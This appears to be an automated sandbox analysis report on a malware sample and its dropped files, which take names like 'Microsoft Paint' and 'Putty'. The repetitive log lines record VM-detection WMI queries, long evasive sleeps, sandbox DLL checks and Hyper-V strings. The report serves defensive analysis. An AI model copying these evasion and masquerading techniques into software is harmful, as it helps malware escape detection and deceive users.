Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Memory allocated: 1AF10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Memory allocated: 1B150000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2750000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1A7E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 24E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1A530000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Window / User API: threadDelayed 9915	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9894	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Window / User API: threadDelayed 9954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9923

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe

Dropped PE file which has not been started: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9836	Thread sleep count: 9894 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 10196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 3672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 8564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 9048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 9224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 1688	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: ptKNiAaGus.exe, 00000000.00000002.3333580070.000000001B79A000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service5
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D683000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D658000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition6457
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitionun?8
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partitiona
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3334551857.000000001B836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"0
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipesu
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V HypervisorrB
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor>
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor;
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
